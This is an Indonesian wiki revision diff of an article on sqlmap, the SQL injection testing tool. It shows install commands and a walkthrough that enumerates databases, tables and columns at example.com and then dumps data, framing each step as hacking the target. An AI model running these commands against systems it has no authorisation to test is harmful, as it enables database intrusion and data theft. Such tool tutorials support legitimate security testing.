Wiki

SQLMAP: Difference between revisions

Newer edit →
Kangtain (talk | contribs)
Bureaucrats, Interface administrators, Suppressors, Administrators
9,154 edits
VisualWikitext
Created page with "'''SQLMAP''' adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih server database. I..."
 
No edit summary
Line 4: Line 4:


==Installasi==
==Installasi==
wget '<nowiki>https://github.com/sqlmapproject/sqlmap/tarball/master</nowiki>' --output-document=sqlmap.tar.gz
<syntaxhighlight lang="shell">
 
wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz
tar -xvf sqlmap.tar.gz
</syntaxhighlight><syntaxhighlight lang="shell">
 
tar -xvf sqlmap.tar.gz
cd sqlmapproject-sqlmap-c4f9e66/
</syntaxhighlight><syntaxhighlight lang="shell">
 
cd sqlmapproject-sqlmap-c4f9e66/
python sqlmap.py --version
</syntaxhighlight><syntaxhighlight lang="shell">
 
python sqlmap.py --version
</syntaxhighlight>
*Atau bisa menggunakana perintah berikut
*Atau bisa menggunakana perintah berikut
sudo apt install sqlmap
<syntaxhighlight lang="shell">
sudo apt install sqlmap
</syntaxhighlight>


==Usage==
==Usage==
*Buka direktori sqlmap Anda dan Jalankan perintah ini untuk menguji perintah sql.
*Buka direktori sqlmap Anda dan Jalankan perintah ini untuk menguji perintah sql.
*Dimana
*Dimana
-u :- artinya url yang akan kita hack
<syntaxhighlight lang="shell">
–dbs :- perintah akan menampilkan daftar database yang dapat diretas.
-u :- artinya url yang akan kita hack
–dbs :- perintah akan menampilkan daftar database yang dapat diretas.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs
<syntaxhighlight lang="shell">
 
sqlmap -u http://www.example.com/about.php?id=1 --dbs
</syntaxhighlight>
*Sekarang retas tabel database yang diretas.
*Sekarang retas tabel database yang diretas.
*Dimana
*Dimana
-D :- berarti nama database yang akan Anda retas
<syntaxhighlight lang="shell">
–tabel :- perintah akan menampilkan semua tabel database yang diretas.
-D :- berarti nama database yang akan Anda retas
–tabel :- perintah akan menampilkan semua tabel database yang diretas.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables
<syntaxhighlight lang="shell">
 
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
</syntaxhighlight>
*Tugas selanjutnya adalah mengambil kolom dari tabel apa pun.
*Tugas selanjutnya adalah mengambil kolom dari tabel apa pun.
*Dimana
*Dimana
-T :- artinya Nama tabel yang akan diretas
<syntaxhighlight lang="shell">
–columns :- perintah akan menampilkan semua kolom tabel.
-T :- artinya Nama tabel yang akan diretas
–columns :- perintah akan menampilkan semua kolom tabel.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns
<syntaxhighlight lang="shell">
 
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
</syntaxhighlight>
*Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel.
*Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel.
*Dimana
*Dimana
-C :- artinya nama Kolom tabel.
<syntaxhighlight lang="shell">
–dump :- perintah akan menampilkan semua data dari kolom yang diberikan.
-C :- artinya nama Kolom tabel.
–dump :- perintah akan menampilkan semua data dari kolom yang diberikan.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
<syntaxhighlight lang="shell">
 
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
</syntaxhighlight>
[[Category:Software]]
[[Category:Software]]
[[Category:Linux]]
[[Category:Linux]]
[[Category:Security]]
[[Category:Security]]
Retrieved from "https://kangtain.com/wiki/index.php/SQLMAP"